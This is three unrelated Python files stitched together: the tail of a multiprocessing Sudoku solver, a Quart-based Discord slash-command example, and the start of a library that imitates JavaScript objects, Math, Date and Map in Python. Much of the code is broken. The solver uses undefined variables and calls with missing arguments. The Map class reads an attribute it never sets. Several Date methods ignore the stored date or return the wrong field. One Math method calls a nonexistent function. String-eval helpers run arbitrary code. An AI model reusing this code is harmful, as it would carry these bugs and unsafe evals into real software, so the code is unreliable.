sq_options.append(cell_options) options.append(sq_options) print("nr of options", math.pow(10, nr_options)) return options count = 0 options = [] solve_size = 2 def solveSudokuTrial(grid, e, return_dic, options, i=0, j=0): i,j = findNextCellToFill(grid, i, j) if i == -1: return_dic[e] = True return True #for e in range(1,10): for e in options[i][j]: if isValidSudoku(grid,i,j,e): grid[i][j] = e if solveSudokuTrial(grid, e, return_dic, options, i, j): print("Found Solution: ", grid, grid[1][1], grid[8][6], grid[4][5]) return_dic[e] = True return True # Undo the current cell for backtracking grid[i][j] = 0 return_dic[e] = False return False def solveSudoku(grid, i=0, j=0): global count global options if (count == 0): options = findoptions(grid) print(options) processes = [] manager = multiprocessing.Manager() return_dict = manager.dict() #while (prev_length != min_length or min_i != prev_i or min_j != prev_j): for i in range (0, len(options)): for j in range (0, len(options[i])): if (len(options[i][j]) > 1): for e in options[i][j]: test_grid = copy.deepcopy(grid) test_grid[i][j] = e print("testing ", i, j, options[i][j], e) p = multiprocessing.Process(target=solveSudokuTrial, args=(test_grid,e, return_dict, options,0, 0)) #test = solveSudokuTrial(test_grid) processes.append(p) p.start() for process in processes: process.join() print("join") print("JOIINED") processes = [] for e in options[i][j]: if (return_dict.has_key(e)): print("return ", e, return_dict[e]) if not return_dict[e]: options[i][j].remove(e) print("removed ", e, options) else: print ("cannot find key ", i, j, e, " in ", return_dict) if (len(options[i][j]) == 1): grid[min_i][min_j] = options[min_i][min_j][0] print("NEW grid ", grid) if len(options[min_i][min_j]) == 0: print ("ERROR CAN NOT SOLVE THIS SUDOKU") return False print("trying last option") return solveSudokuTrial(grid) # min_length = 10 # prev_i = min_i # prev_j = min_j # prev_length = min_length # for i in range (0, len(options)): # for j in range (0, len(options[i])): # # print(i, j, len(options[i][j]), min_length, min_i, min_j) # if (len(options[i][j]) > 1 and len(options[i][j]) < min_length): # min_length = len(options[i][j]) # min_i = i # min_j = j # print("examining ", min_i, min_j, prev_length, min_length) # if min_i == -1: # print("trying last option") # return solveSudokuTrial(grid) # nr_processes = 0 # print("FINISHED", found, min_i, min_j) def main(argv): parser = argparse.ArgumentParser(description='solve sudoke with 3 variables') parser.add_argument('-d', '--vard', default=0, type=int) parser.add_argument('-e', '--vare', default=0, type=int) parser.add_argument('-f', '--varf', default=0, type=int) parser.add_argument('-g', '--varg', default=0, type=int) parser.add_argument('-hh', '--varh', default=0, type=int) parser.add_argument('-i', '--vari', default=0, type=int) args=parser.parse_args() input[0][7] = args.vard input[1][8] = args.vare input[2][6] = args.varf input[1][1] = args.varg input[8][6] = args.varh input[4][5] = args.vari solveSudoku(input) if __name__ == "__main__": main(sys.argv[1:])
async_quart.py
import os import sys import time import asyncio import threading from quart import Quart # This is just here for the sake of examples testing # to make sure that the imports work # (you don't actually need it in your code) sys.path.insert(1, ".") import quart.flask_patch from flask_discord_interactions import (DiscordInteractions, # noqa: E402 Response) app = Quart(__name__) discord = DiscordInteractions(app) app.config["DISCORD_CLIENT_ID"] = os.environ["DISCORD_CLIENT_ID"] app.config["DISCORD_PUBLIC_KEY"] = os.environ["DISCORD_PUBLIC_KEY"] app.config["DISCORD_CLIENT_SECRET"] = os.environ["DISCORD_CLIENT_SECRET"] discord.update_slash_commands() # You can now use async functions! @discord.command() async def ping(ctx): "Respond with a friendly 'pong'!" return "Pong!" # Non-async functions still work @discord.command() def pong(ctx): return "Ping!" # You can use followups with asyncio @discord.command() async def wait(ctx, seconds: int): async def do_followup(): await asyncio.sleep(seconds) await ctx.edit("Done!") await ctx.close() asyncio.create_task(do_followup()) return Response(deferred=True) # Normal followups work as well @discord.command() def wait_sync(ctx, seconds: int): def do_followup(): time.sleep(seconds) ctx.edit("Done!") threading.Thread(target=do_followup).start() return Response(deferred=True) # Use set_route_async if you want to use Quart discord.set_route_async("/interactions") discord.update_slash_commands(guild_id=os.environ["TESTING_GUILD"]) if __name__ == '__main__': app.run()
javascript.py
""" domonic.javascript ==================================== - https://www.w3schools.com/jsref/jsref_reference.asp - https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference """ import array import datetime import gc import json import math import multiprocessing import os import random import re import signal import struct import sys import threading import time import urllib.parse from multiprocessing.pool import ThreadPool as Pool from typing import Any, Callable, Dict, List, Optional, Tuple, Union from urllib.parse import quote, unquote import requests from dateutil.parser import parse from domonic.webapi.url import URL, URLSearchParams from domonic.webapi.webstorage import Storage def function(python_str: str) -> str: """[evals a string i.e. sup = function('''print(hi)''') sup() ] Args: python_str ([str]): [some valid python code as a string] """ def anon(): return eval(python_str) return anon # TODO - list all javascript keywords to python keywords true: bool = True false: bool = False null: object = None undefined: object = None # globalThis # TODO - do i need to use inpect? or is globals() ok? # def typeof(v): # return type(v).__name__ class Boolean(): """[Creates a Boolean Object. Warning this is NOT a boolean type. for that use Global.Boolean()] """ def __init__(self, value=False) -> None: self.value: bool = Global.Boolean(value) class Object: def __init__(self, obj=None, *args, **kwargs) -> None: """[Creates a Javascript-like Object in python] Args: obj ([type]): [pass an object, dict or callable to the contructor] """ # print('object created!') if obj is None: obj = {} self.prototype = self.__class__ self.__extensible = True self.__frozen = False self.__sealed = False for arg in args: self.__dict__.update(arg) self.__dict__.update(kwargs) # self.__dict__ = {} if callable(obj): self.__dict__.update(obj()) if isinstance(obj, dict): self.__dict__.update(obj) else: try: self.__dict__ = {} self.__dict__.update(obj.__dict__) self.__dict__.update(kwargs) self.__dict__.update(args) # self.__dict__['__class__'] = obj.__class__.__name__ # self.__dict__['__module__'] = obj.__module__ # self.__dict__['__doc__'] = obj.__doc__ # self.__dict__['__proto__'] = obj # self.__dict__['__proto__'].__class__ = Object # self.__dict__['__proto__'].__dict__ = self.__dict__ except Exception as e: print("Object.__init__() failed to set attribs", e) def __str__(self): """ Returns a string representation of the object """ d = self.__dict__.copy() for k, v in list(d.items()): if '__' in k: del d[k] if 'prototype' in k: del d[k] return str(d) # def __repr__(self): # """ Returns a string representation of the object.""" # return self.toString() @staticmethod def fromEntries(entries): """ transforms a list of lists containing key and value into an object. @param entries: a list containing key and value tuples. The key and value are separated by ':' @type entries: list of tuple(string, string) @returns: a dict object. >>> fromEntries(entries) {'a': 1, 'b': 2, 'c': 3} """ return {k: v for k, v in entries} @staticmethod def assign(target, source): """ Copies the values of all enumerable own properties from one or more source objects to a target object. """ if isinstance(target, dict): if isinstance(source, dict): for k, v in source.items(): target[k] = v else: for k, v in source.__dict__.items(): target[k] = v else: if isinstance(source, dict): for k, v in source.items(): setattr(target, k, v) else: for k, v in source.attribs.items(): setattr(target, k, v) # return target # for prop in source.__dict__: # if source.propertyIsEnumerable(prop): # target.__dict__[prop] = source.__dict__[prop] return target @staticmethod def create(proto, propertiesObject=None): """ Creates a new object with the specified prototype object and properties. """ if propertiesObject is None: return Object(proto) if isinstance(propertiesObject, dict): return Object(propertiesObject) elif isinstance(propertiesObject, Object): return propertiesObject elif isinstance(propertiesObject, list): return Object.fromEntries(propertiesObject) else: return propertiesObject # return Object(propertiesObject) # obj = {} # for key in proto.keys(): # obj[key] = propertiesObject[key] # return obj @staticmethod def defineProperty(obj, prop, descriptor): """ Adds the named property described by a given descriptor to an object. """ obj[prop] = descriptor # @staticmethod # def defineProperties(obj, props): # """ Adds the named properties described by the given descriptors to an object. """ # for prop, desc in props.items(): # obj.__define_property__(prop, desc) # TODO - obviously that wont work @staticmethod def entries(obj): """ Returns an array containing all of the [key, value] pairs in the object. """ if isinstance(obj, dict): return [[k, v] for k, v in obj.items()] if isinstance(obj, (float, int)): return [] @staticmethod def keys(obj): """ Returns an array containing the names of all of the given object's own enumerable string properties.""" if isinstance(obj, dict): return obj.keys() if isinstance(obj, (float, int)): return [] return obj.__dict__.keys() # TODO - this is probably wrong @staticmethod def values(obj): """ Returns an array containing the values that correspond to all of a given object's own enumerable string properties. """ if isinstance(obj, dict): return obj.values() if isinstance(obj, (float, int)): return [] return obj.__dict__.values() # TODO - this is probably wrong @staticmethod def getOwnPropertyDescriptor(obj, prop): """ Returns a property descriptor for a named property on an object. """ if isinstance(obj, dict): return obj[prop] return obj.__dict__[prop] @staticmethod def getOwnPropertyNames(obj): """ Returns an array containing the names of all of the given object's own enumerable and non-enumerable properties. """ if isinstance(obj, dict): return obj.keys() elif isinstance(obj, Object): return obj.__dict__.keys() elif isinstance(obj, object): return [prop for prop in dir(obj) if not prop.startswith('__')] return obj.__dict__.keys() # @staticmethod # def _is(value1, value2): # """ Compares if two values are the same value. # Equates all NaN values (which differs from both Abstract Equality Comparison # and Strict Equality Comparison).""" # pass @staticmethod def getOwnPropertySymbols(obj): """ Returns an array of all symbol properties found directly upon a given object. """ if isinstance(obj, dict): return [] return [prop for prop in dir(obj) if not prop.startswith('__')] @staticmethod def getPrototypeOf(obj): """ Returns the prototype (internal [[Prototype]] property) of the specified object. """ if isinstance(obj, dict): return obj elif isinstance(obj, Object): return obj.prototype elif isinstance(obj, object): return obj.__class__ return obj.__proto__ # @property #TODO - static or prop? # def isExtensible(obj): # """ Determines if extending of an object is allowed """ # return obj.__extensible # @property #TODO - static or prop? # def isSealed(obj): # """ Determines if an object is sealed """ # return obj.__sealed # @property # def preventExtensions(obj): # """ Prevents any extensions of an object. """ # if isinstance(obj, dict): # return False # elif isinstance(obj, Object): # obj.extensible = False # return True # elif isinstance(obj, object): # return False # return False # @property # def seal(obj): # """ Prevents other code from deleting properties of an object. """ # if isinstance(obj, dict): # return False # elif isinstance(obj, Object): # obj.sealed = True # return True # elif isinstance(obj, object): # return False # return False # @property # def setPrototypeOf(obj, prototype): # """ Sets the object's prototype (its internal [[Prototype]] property). """ # if isinstance(obj, dict): # return False # elif isinstance(obj, Object): # obj.prototype = prototype # return True # elif isinstance(obj, object): # return False # return False @property # TODO - static or prop? def isFrozen(self, obj): """ Determines if an object was frozen. """ return self.__isFrozen @staticmethod # TODO - static or prop? def freeze(obj): """ Freezes an object. Other code cannot delete or change its properties. """ obj.__isFrozen = True # def prototype(self, obj): # """ # prototype and allows you to add properties and methods to this object # """ # if isinstance(obj, dict): # return False # elif isinstance(obj, Object): # obj.prototype = self # return True # elif isinstance(obj, object): # return False # return False def __defineGetter__(self, prop, func): """ Adds a getter function for the specified property. """ self.__dict__[prop] = property(func) return self def __defineSetter__(self, prop, func): """ Associates a function with a property that, when set, calls the function. """ self.__dict__[prop] = property(func) return self def __lookupGetter__(self, prop): """ Returns the getter function for the specified property. """ return self.__dict__[prop] def __lookupSetter__(self, prop): """ Returns the function associated with the specified property by the __defineSetter__() method. """ return self.__dict__[prop] def hasOwnProperty(self, prop): """ Returns a boolean indicating whether an object contains the specified property as a direct property of that object and not inherited through the prototype chain. """ # raise NotImplementedError # return hasattr(self, prop) return self.__dict__.get(prop, None) != None def isPrototypeOf(self, obj): """ Returns a boolean indicating whether an object is a copy of this object. """ if isinstance(obj, Object): return obj.prototype == self elif isinstance(obj, dict): return obj == self elif isinstance(obj, object): return obj.__class__ == self.__class__ and obj.__dict__ == self.__dict__ return obj.__class__ == self.__class__ and obj.__proto__ == self # def propertyIsEnumerable(self, prop): # """ Returns a boolean indicating whether the specified property is enumerable. """ # pass def toLocaleString(self): """ Calls toString()""" return self.toString() def toString(self): """ Returns a string representation of the object.""" return '[' + self.__class__.__name__ + ': ' + str(self.__dict__) + ']' def valueOf(self): """ Returns the value of the object. """ return self def __iter__(self): """ Iterates over object's properties. """ for prop in self.__dict__: yield prop for key in self.__dict__: yield key # return # return self.__dict__.__iter__() def __hash__(self): """ Returns the hash of the object. """ return hash(self.toString()) def __eq__(self, other): """ Compares two objects. """ if isinstance(other, Object): return self.toString() == other.toString() return False def __ne__(self, other): """ Compares two objects. """ if isinstance(other, Object): return self.toString() != other.toString() return True def __nonzero__(self): """ Returns whether the object is false. """ return self.toString() != '' def __bool__(self): """ Returns whether the object is false. """ return self.toString() != '' # def __dict__(self): # """ Returns the object's attributes as a dictionary. """ # return self.__dict__ def __getitem__(self, key): """ Returns the value of the specified property. """ # return self.__dict__[key] # return self.__dict__.get(key, None) return self.__dict__.get(key) def __deepcopy__(self, memo): """ Makes a deep copy of the object. """ return self.__class__(self.__dict__) def __setitem__(self, key, value): """ Sets the value of the specified property. """ # self.__dict__[key] = value return self.__dict__.__setitem__(key, value) def __delitem__(self, key): """ Deletes the specified property. """ del self.__dict__[key] def __len__(self): """ Returns the number of properties. """ return len(self.__dict__) def __contains__(self, key): """[Returns whether the specified property exists.] Args: key ([str]): [The name of the property to check for.] Returns: [bool]: [True if the specified property exists. Otherwise, False.] """ return key in self.__dict__ def __getattr__(self, name): """[gets the value of the specified property] Args: name ([str]): [the name of the property] Returns: [str]: [the value of the specified property] """ return self.__getitem__(name) def __setattr__(self, name, val): """[sets the value of the specified property] Args: name ([str]): [the name of the property] val ([str]): [the value of the property] Returns: [str]: [the value of the property] """ return self.__setitem__(name, val) def __delattr__(self, name): """[deletes the specified property] Args: name ([str]): [the name of the property] Returns: [type]: [the value of the property] """ return self.__delitem__(name) # def __call__(self, *args, **kwargs): # """ Calls the object. """ # return self.toString() class Function(Object): """ a Function object """ def __init__(self, func, *args, **kwargs): self.func = func self.arguments = args self.caller = None self.displayName = None self.length = None self.name = None # self.isCallable = True # self.constructor = False # self.__proto__ = None def apply(self, thisArg=None, args=None, **kwargs): """[calls a function with a given this value, and arguments provided as an array] Args: thisArg ([type]): [The value of this provided for the call to func.] Returns: [type]: [result of calling the function.] """ if thisArg is not None: try: return self.func(args) # kwargs? except TypeError: return self.func() try: return self.func(*args) except TypeError: return self.func() def bind(self, thisArg, *args, **kwargs): """[creates a new function that, when called, has its this keyword set to the provided value, with a given sequence of arguments preceding any provided when the new function is called.] Args: thisArg ([type]): [The value to be passed as the this parameter to the target function func when the bound function is called.] Returns: [type]: [A copy of the given function with the specified this value, and initial arguments (if provided).] """ from functools import partial bound_f = partial(self.func, *args, *kwargs) return bound_f # raise NotImplementedError # @staticmethod def call(self, thisArg=None, *args, **kwargs): """[calls a function with a given this value and arguments provided individually.] Args: thisArg ([type]): [description] Returns: [type]: [result of calling the function.] """ if thisArg is not None: try: return self.func(thisArg) # kwargs? except TypeError as e: print(e) return self.func() try: return self.func(*args) except TypeError: return self.func() def toString(self): """[Returns a string representing the source code of the function. Overrides the] """ raise NotImplementedError class Map: """ Map holds key-value pairs and remembers the original insertion order of the keys. """ def __init__(self, collection): """[Pass a list or collection to make a Map object] Args: collection ([type]): [a list or dict] """ # parses the passed collectionn if isinstance(collection, list): # create a dict from the list self.collection = dict(zip(collection, collection)) if isinstance(collection, dict): # use the passed dict self.collection = collection else: raise TypeError("Map requires a list or dict.") self._data: dict = {} self._order: list = [] def __contains__(self, key: str): return key in self._dict def __getitem__(self, key: str): return self._dict[key] def __setitem__(self, key: str, value): if key not in self._dict: self._order.append(key) self._dict[key] = value def __delitem__(self, key: str): self._order.remove(key) del self._dict[key] def clear(self): """ Removes all key-value pairs from the Map object. """ self._data = {} self._order = [] def delete(self, key: str) -> bool: """ Returns true if an element in the Map object existed and has been removed, or false if the element does not exist. Map.prototype.has(key) will return false afterwards. """ try: self._order.remove(key) del self._dict[key] return True except Exception: return False def get(self, key: str, default=None): """ Returns the value associated to the key, or undefined if there is none. """ return self._dict.get(key, default) def has(self, key: str) -> bool: """ Returns a boolean asserting whether a value has been associated to the key in the Map object or not.""" return key in self._dict def set(self, key: str, value): """ Sets the value for the key in the Map object. Returns the Map object. """ if key not in self._dict: self._order.append(key) self._dict[key] = value return self def iterkeys(self): return iter(self._order) def iteritems(self): for key in self._order: yield key, self._dict[key] def keys(self): """ Returns a new Iterator object that contains the keys for each element in the Map object in insertion order. """ return list(self.iterkeys()) def values(self): """ Returns a new Iterator object that contains the values for each element in the Map object in insertion order. """ return list(self.iteritems()) def entries(self): """ Returns a new Iterator object that contains an array of [key, value] for each element in the Map object in insertion order. """ return [(x, self._dict[x]) for x in self._order] # def forEach(self, callbackFn[, thisArg]): # raise NotImplementedError # TODO - is this supposed to pass count like Node list? i.e. # for i in range(len(self.args)): # func(self.args[i], i, self.args) def update(self, ordered_dict): for key, value in ordered_dict.iteritems(): self[key] = value def __str__(self): return str([(x, self._dict[x]) for x in self._order]) # TODO - moved to webapi.xhr . might import here for convenience? # class FormData: # """[utils for a form] # Args: # object ([str]): [takes a string or pyml object and returns a FormData] # """ # def __init__(self, form): # """ creates a new FormData object. """ # # TODO - parse to domonic. # # if isinstance(form, str): # # self._data = domonic.loads(form) # TODO - parser wont be done enough yet # # if isinstance(form, Node): # # self._data = form # raise NotImplementedError # def append(self, name, value, filename): # """ Appends a new value onto an existing key inside a FormData object, # or adds the key if it does not already exist. """ # raise NotImplementedError # def delete(self, name): # """ Deletes a key/value pair from a FormData object. """ # raise NotImplementedError # def entries(self): # """ Returns an iterator allowing to go through all key/value pairs contained in this object. """ # raise NotImplementedError # def get(self, name): # """ Returns the first value associated with a given key from within a FormData object. """ # raise NotImplementedError # def getAll(self, name): # """ Returns an array of all the values associated with a given key from within a FormData """ # raise NotImplementedError # def has(self, name): # """ Returns a boolean stating whether a FormData object contains a certain key.""" # raise NotImplementedError # def keys(self): # """ Returns an iterator allowing to go through all keys of the key/value pairs contained in this object.""" # raise NotImplementedError # def set(self, name, value, filename): # """ Sets a new value for an existing key inside a FormData object, # or adds the key/value if it does not already exist.""" # raise NotImplementedError # def values(self): # """ Returns an iterator allowing to go through all values contained in this object.""" # raise NotImplementedError class Worker: """[A background task that can be created via script, which can send messages back to its creator. Creating a worker is done by calling the Worker("path/to/worker/script") constructor.] TODO - JSWorker - Node Args: object ([str]): [takes a path to a python script] """ def __init__(self, script): """ creates a new Worker object. """ raise NotImplementedError def postMessage(self): """ Sends a message — consisting of any object — to the worker's inner scope. """ raise NotImplementedError def terminate(self): """ Immediately terminates the worker. This does not let worker finish its operations; it is halted at once. ServiceWorker instances do not support this method. """ raise NotImplementedError class Math(Object): """ Math class that mirrors javascript implementation. i.e. you can pass strings and it will also work, Math.abs('-1') """ PI: float = 3.141592653589793 E: float = 2.718281828459045 LN2: float = 0.6931471805599453 LN10: float = 2.302585092994046 LOG2E: float = 1.4426950408889634 LOG10E: float = 0.4342944819032518 SQRT1_2: float = 0.7071067811865476 SQRT2: float = 1.4142135623730951 def _force_number(func): """[private decorator to make Math behave like javascript and turn strings, bools and None into numbers]] """ def validation_decorator(*args, **kwargs): params = list(args) for i, n in enumerate(params): if type(n) == list or type(n) == tuple: if len(n) == 0: params[i] = n = 0 elif len(n) == 1: params[i] = n = n[0] if type(n) == str: if n == "": params[i] = n = 0 continue if n is None: params[i] = 0 continue if type(n) != float and type(n) != int: try: if '.' in n: params[i] = float(n) else: params[i] = int(n) except Exception: # raise ValueError("") # js returns None instead pass args = tuple(params) try: return func(*args) except Exception: return None return validation_decorator @staticmethod @_force_number def abs(x: float) -> float: """[Returns the absolute value of a number.] Args: x ([float]): [number] Returns: [float]: [absolute value] """ return abs(x) @staticmethod @_force_number def acos(x: float) -> float: """[Returns the arccosine (in radians) of a number.] Args: x ([float]): [number] Returns: [float]: [arccosine] """ return math.acos(x) @staticmethod @_force_number def acosh(x: float) -> float: """ Returns the hyperbolic arccosine of a number. """ return math.acosh(x) @staticmethod @_force_number def asin(x: float) -> float: """ Returns the arcsine (in radians) of a number. """ return math.asin(x) @staticmethod @_force_number def asinh(x: float) -> float: """ Returns the hyperbolic arcsine of a number. """ return math.asinh(x) @staticmethod @_force_number def atan(x: float) -> float: """ Returns the arctangent (in radians) of a number. """ return math.atan(x) @staticmethod @_force_number def atan2(x: float, y: float) -> float: """ Returns the arctangent of the quotient of its arguments. """ return math.atan2(x, y) @staticmethod @_force_number def atanh(x: float) -> float: """ Returns the hyperbolic arctangent of a number. """ return math.atanh(x) @staticmethod @_force_number def cbrt(x: float) -> float: """ Returns the cube root of a number. """ return math.cbrt(x) @staticmethod @_force_number def ceil(x: float) -> float: """ Returns the smallest integer greater than or equal to a number. """ return math.ceil(x) @staticmethod @_force_number def cos(x: float) -> float: """ Returns the cosine of a number. (x is in radians) """ return math.cos(x) @staticmethod @_force_number def cosh(x: float) -> float: """ Returns the hyperbolic cosine of a number. """ return math.cosh(x) @staticmethod @_force_number def exp(x: float) -> float: """ Returns the value of E^x. """ return math.exp(x) @staticmethod @_force_number def floor(x: float) -> float: """ Returns the largest integer less than or equal to a number. """ return math.floor(x) @staticmethod @_force_number def log(x: float, base: float = None) -> float: """ Returns the natural logarithm (base E) of a number. """ if base is None: return math.log(x) else: return math.log(x, base) @staticmethod @_force_number def max(x: float, y: float) -> float: """ Returns the largest of two numbers. """ return max(x, y) @staticmethod @_force_number def min(x: float, y: float) -> float: """ Returns the smallest of two numbers. """ return min(x, y) @staticmethod @_force_number def random() -> float: """ Returns a random number between 0 and 1. """ return random.random() @staticmethod @_force_number def round(x: float) -> float: """ Returns the value of a number rounded to its nearest integer. """ return round(x) @staticmethod @_force_number def pow(x: float, y: float) -> float: """ Returns the value of a number raised to a power. """ return math.pow(x, y) @staticmethod @_force_number def sin(x: float) -> float: """ Returns the sine of a number. (x is in radians) """ return math.sin(x) @staticmethod @_force_number def sinh(x: float) -> float: """ Returns the hyperbolic sine of a number. """ return math.sinh(x) @staticmethod @_force_number def sqrt(x: float) -> float: """ Returns the square root of a number. """ return math.sqrt(x) @staticmethod @_force_number def tan(x: float) -> float: """ Returns the tangent of a number. (x is in radians) """ return math.tan(x) @staticmethod @_force_number def tanh(x: float) -> float: """ Returns the hyperbolic tangent of a number. """ return math.tanh(x) @staticmethod @_force_number def trunc(x: float) -> float: """ Returns the integer part of a number. """ return math.trunc(x) # TODO - test @staticmethod # @_force_number def hypot(*args): """ returns the square root of the sum of squares of its arguments """ return math.hypot(*args) # TODO - test @staticmethod # @_force_number def log2(*args): """ returns the square root of the sum of squares of its arguments """ return math.log2(*args) # TODO - test @staticmethod # @_force_number def loglp(*args): """ returns the natural logarithm (base e) of 1 + a number, that is """ return math.loglp(*args) # TODO - test @staticmethod @_force_number def log10(x): """ function returns the base 10 logarithm of a number, that is """ return math.log10(x) # TODO - test @staticmethod @_force_number def fround(x): """ returns the nearest 32-bit single precision float representation of a Number """ # return math.log10(x) raise NotImplementedError # TODO - test @staticmethod @_force_number def clz32(x): """ returns the number of leading zero bits in the 32-bit binary representation of a number. """ raise NotImplementedError # import urllib class Global: """ javascript global methods """ NaN = "NaN" Infinity = float("inf") __timers = {} # TODO - https://stackoverflow.com/questions/747641/what-is-the-difference-between-decodeuricomponent-and-decodeuri @staticmethod def decodeURI(x): """ Decodes a URI """ return unquote(x) @staticmethod def decodeURIComponent(x): """ Decodes a URI component """ return unquote(x, encoding="utf-8") @staticmethod def encodeURI(x): """ Encodes a URI """ return quote(str(x), safe='~@#$&()*!+=:;,.?/\'') @staticmethod def encodeURIComponent(x): """ Encodes a URI component """ return quote(str(x), safe='~()*!.\'') # @staticmethod # def escape(): """ Deprecated in version 1.5. Use encodeURI() or encodeURIComponent() """ # pass @staticmethod def eval(pythonstring): """ Evaluates a string and executes it as if it was script code """ eval(pythonstring) @staticmethod def isFinite(x) -> bool: # TODO - test """ Returns true if x is a finite number """ return math.isfinite(x) @staticmethod def isNaN(x): """ Determines whether a value is an illegal number """ try: return math.isnan(x) except TypeError: return True def NaN(self): """ "Not-a-Number" value """ # return self.NaN return "NaN" @staticmethod def Number(x): """ Converts an object's value to a number """ try: if type(x) == float or type(x) == int: # or type(x) == long: return x if type(x) == str: if '.' in x: return float(x) else: return int(x) except Exception: return "NaN" return "NaN" @staticmethod def Boolean(x): # TODO - test if isinstance(x, int): return bool(x) elif isinstance(x, str): if x.lower() == 'true': return True elif x.lower() == 'false': return False elif x == '': return False else: return True elif isinstance(x, bool): return x elif isinstance(x, (list, tuple, dict, object)): return True elif x is None: return False else: return True @staticmethod def parseFloat(x: str): """ Parses a string and returns a floating point number """ # return float(x) import ast return float(ast.literal_eval(x)) @staticmethod def parseInt(x: str): """ Parses a string and returns an integer """ # return int(x) import ast return int(ast.literal_eval(x)) @staticmethod def String(x): """ Converts an object's value to a string """ return str(x) def undefined(self): """ Indicates that a variable has not been assigned a value """ return None # @staticmethod # def unescape(): """ Deprecated in version 1.5. Use decodeURI() or decodeURIComponent() instead """ # pass @staticmethod def require(path: str): """ Loads a script from a file """ # '.'.join(path.split('/')) # module = __import__(path) # app.components.{component} # my_class = getattr(module, component.title()) # return my_class() raise NotImplementedError @staticmethod def setTimeout(callback, t, *args, **kwargs): """[sets a timer which executes a function or evaluates an expression after a specified delay] Args: callback (function): [method to be executed after the delay] t ([int]): [milliseconds] Returns: [str]: [an identifier for the timer] """ if isinstance(callback, str): callback = eval(callback) timer = threading.Timer(t / 1000, callback, args=args, kwargs=kwargs) timer_id = id(timer) Global.__timers[timer_id] = timer timer.start() return timer_id @staticmethod def clearTimeout(timeoutID): """ [cancels a timer set with setTimeout()] Args: timeoutID ([str]): [the identifier returned by setTimeout()] """ Global.__timers.pop(timeoutID).cancel() # NOTE - for globals use the class to make them but then register them here decodeURI = Global.decodeURI decodeURIComponent = Global.decodeURIComponent encodeURI = Global.encodeURI encodeURIComponent = Global.encodeURIComponent parseFloat = Global.parseFloat parseInt = Global.parseInt setTimeout = Global.setTimeout clearTimeout = Global.clearTimeout class Performance(): _start = time.time() def __init__(self): pass def now(self): end = time.time() return end - Performance._start # def reset(self): # Performance._start = time.time() performance = Performance() class Date(Object): """ javascript date """ def __init__(self, date=None, formatter='python'): self.formatter = formatter if isinstance(date, int): self.date = datetime.datetime.fromtimestamp(date) return # elif isinstance(date, str): # if formatter == 'python': # self.date = datetime.datetime.strptime(date, '%Y-%m-%d %H:%M:%S') # elif formatter == 'javascript': # self.date = datetime.datetime.strptime(date, '%Y-%m-%dT%H:%M:%S.%fZ') # else: # raise ValueError('Invalid formatter') if date is None: self.date = datetime.datetime.now() else: self.date = self.parse_date(date) def __str__(self): return self.toString() def toString(self): """ Returns a string representation of the date """ if self.formatter == 'python': return self.date.strftime('%Y-%m-%d %H:%M:%S') else: return self.date.strftime('%Y-%m-%dT%H:%M:%S.%fZ') # js def parse_date(self, date_string): self.date = parse(date_string) return self.date def getDate(self): """ Returns the day of the month (from 1-31) """ return self.date.day # TODO - do for a date object passed in. this only does today def getDay(self): """ Returns the day of the week (from 0-6) """ day = self.date.isoweekday() return day if (day < 7) else 0 # TODO - do for a date object passed in. this only does today def getFullYear(self): """ Returns the year """ return self.date.now().year def getHours(self): """ Returns the hour (from 0-23) """ return self.date.now().hour def getMilliseconds(self): """ Returns the milliseconds (from 0-999) """ return round(self.date.now().microsecond / 1000) def getMinutes(self): """ Returns the minutes (from 0-59) """ return self.date.now().minute def getMonth(self): """ Returns the month (from 0-11) """ return self.date.now().month - 1 def getSeconds(self): """ Returns the seconds (from 0-59) """ return self.date.now().second def getTime(self): """ Returns the number of milliseconds since midnight Jan 1 1970, and a specified date """ return int(str(time.time()).split('.')[0]) # TODO - whats difference between this and 'now()' ? def getTimezoneOffset(self): """ Returns the time difference between UTC time and local time, in minutes """ return self.date.now().utcoffset().total_seconds() / 60 # TODO - TEST def getUTCDate(self): """ Returns the day of the month, according to universal time (from 1-31) """ return self.date.utcnow().month def getUTCDay(self): """ Returns the day of the week, according to universal time (from 0-6) """ return self.date.utcnow().day def getUTCFullYear(self): """ Returns the year, according to universal time """ return self.date.utcnow().year def getUTCHours(self): """ Returns the hour, according to universal time (from 0-23) """ return self.date.utcnow().hour def getUTCMilliseconds(self): """ Returns the milliseconds, according to universal time (from 0-999) """ return round(self.date.utcnow().microsecond / 1000) def getUTCMinutes(self): """ Returns the minutes, according to universal time (from 0-59) """ return self.date.utcnow().minute def getUTCMonth(self): """ Returns the month, according to universal time (from 0-11) """ return self.date.utcnow().month - 1 def getUTCSeconds(self): """ Returns the seconds, according to universal time (from 0-59) """ return self.date.utcnow().second def getYear(self): """ Deprecated. Use the getFullYear() method instead """ return self.date.now().year @staticmethod def now(): """ Returns the number of milliseconds since midnight Jan 1, 1970 """ return round(time.time() * 1000) # @staticmethod def parse(self, date_string): """ Parses a date string and returns the number of milliseconds since January 1, 1970 """ self.date = self.parse_date(str(date_string)) #  TODO - huh? # return self.date.getTime() def setDate(self, day): """ Sets the day of the month of a date object """ self.date.replace(day=int(day)) # return self.date.getTime() def setFullYear(self, year): """ Sets the year of a date object """ self.date.replace(year=int(year)) # return self.date.getTime() def setHours(self, hours): """ Sets the hour of a date object """ self.date.replace(hour=int(hours)) # return self.date.getTime() def setMilliseconds(self, milliseconds): """ Sets the milliseconds of a date object """ # self.date.replace(millisecond=int(milliseconds)) # return self.now() print('TODO: setMilliseconds') pass # TODO - , seconds = None, milliseconds = None): def setMinutes(self, minutes): """ Set the minutes of a date object """ self.date.replace(minute=int(minutes)) # return self.now() def setMonth(self, month): """ Sets the month of a date object """ self.date.replace(month=int(month)) # return self.now() def setSeconds(self, seconds): """ Sets the seconds of a date object """ self.date.replace(second=int(seconds)) # return self.now() # Sets a date to a specified number of milliseconds after/before January 1, 1970 def setTime(self, milliseconds=None): """ Sets the number of milliseconds since January 1, 1970 """ # test copilot # self.date.replace(millisecond=int(milliseconds)) # return self.now() # TODO - is this right? - is this same as now()? # print('TODO: setTime') # raise NotImplementedErro pass def setUTCDate(self, day): """ Sets the day of the month of a date object, according to universal time """ self.setDate(day) # return self.getTime() def setUTCFullYear(self, year): """ Sets the year of a date object, according to universal time """ self.setFullYear(year) # return self.getTime() def setUTCHours(self, hour): """ Sets the hour of a date object, according to universal time """ self.setHours(hour) # return self.getTime() def setUTCMilliseconds(self, milliseconds): """ Sets the milliseconds of a date object, according to universal time """ self.setMilliseconds(milliseconds) # return self.getTime() def setUTCMinutes(self, minutes): """ Set the minutes of a date object, according to universal time """ self.setMinutes(minutes) # return self.getTime() def setUTCMonth(self, month): """ Sets the month of a date object, according to universal time """ 